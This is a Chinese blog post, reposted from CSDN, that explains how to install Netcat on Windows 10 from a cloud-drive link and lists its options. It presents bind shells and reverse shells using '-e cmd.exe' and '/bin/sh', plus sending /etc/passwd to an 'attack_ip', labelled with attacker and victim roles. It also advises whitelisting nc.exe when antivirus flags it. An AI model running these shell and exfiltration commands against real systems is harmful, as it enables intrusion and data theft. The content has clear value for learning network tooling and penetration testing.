sunny123456

  博客园 :: 首页 :: 博问 :: 闪存 :: 新随笔 :: 联系 :: 订阅 订阅 :: 管理 ::

Windows 10 安装和使用Netcat

Windows 10 安装和使用Netcat

简介:
Netcat简称nc,netcat是网络工具中的瑞士军刀,它能通过TCP和UDP在网络中读写数据,通过与其它工具结合和重定向,你可以在脚本中以多种方式使用它,使用netcat命令能够完成很多实验。

1.nc下载
网盘链接:https://pan.baidu.com/s/1BHfHtup3OlVxxSovhT1-xQ
提取码:nc12

2.解压到自定义文件夹
在这里插入图片描述
解压后的文件如图
3.按照使用指导将nc.exe文件复制到C:\Windows\System32文件中
这里杀毒软件可能会报错,把文件添加到信任区即可。
4.检测是否成功
win+r cmd打开两个命令行
分别输入指令:nc -l -p 7777 (对7777端口开启监听)
之后在下方输入 如果另外一个命令行能监听到即为成功。
在这里插入图片描述
nc localhost 7777 (对之前开启的监听进行检验)
在这里插入图片描述
这里可以成功进行监听。

参数说明
-d后台执行
-e prog程序重定向,一旦连接,就执行
-g gateway源路由跳数,最大值为8(source-routing hop point[s],up to 8)
-G num源路由指针:4,8,12,… (source-routing pointer: 4,8,12,…)
-h查看帮助信息
-i secs延时的间隔
-l监听模式,用于入站连接
-n指定数字的IP地址,不能用hostname
-o file记录16进制的传输
-p port本地端口号
-r任意指定本地及远程端口
-s addr本地源地址
-uUDP模式(netcat-1.15可以:远程nc -ulp port -e cmd.exe,本地nc -u ip port连接,得到一个shell. )
-w secs指定超时的时间
-z将输入输出关掉——用于扫描时
-v详细输出——用两个-v可得到更详细的内容

基本用法
① 端口扫描:
nc -vv ip port
例:nc -vv 192.168.1.1 5000 扫描192.168.1.1的tcp 5000端口
nc -vv -w secs ip port-port
例:nc -vv -w 5 192.168.1.1 5000-5002
扫描192.168.1.1的5000-6000端口,网络超时的时间设为5秒
注意超时时间的单位是秒不是毫秒,另外nc这个用法的扫描效率远不及nmap

②正向连接
被攻击主机的需要是完整版的nc,有些版本的nc没有-e这个参数。
nc -l -p port -e cmd.exe #被攻击主机如果是windows
nc -l -p port -e /bin/sh #被攻击主机是linux
攻击者连接方式很简单:
nc ip port

③反向连接
攻击主机先开始监听端口:
nc -lvvp port
被攻击主机连接攻击者监听的端口:
nc -e cmd.exe ip port #被攻击主机如果是windows
nc -e /bin/sh ip port #被攻击主机是linux

④传送文件
攻击主机先开始监听:
nc -d -l -p port > tmp
被攻击主机再开始传送文件:
nc attack_ip port < /etc/passwd

⑤下载文件
攻击主机先开始监听:
nc -d -l -p port < tmp
被攻击主机再开始下载文件:
nc attack_ip port > tmp

原文链接:https://blog.csdn.net/weixin_47036398/article/details/123479376
posted on 2024-01-03 19:30  sunny123456  阅读(621)  评论(0编辑  收藏  举报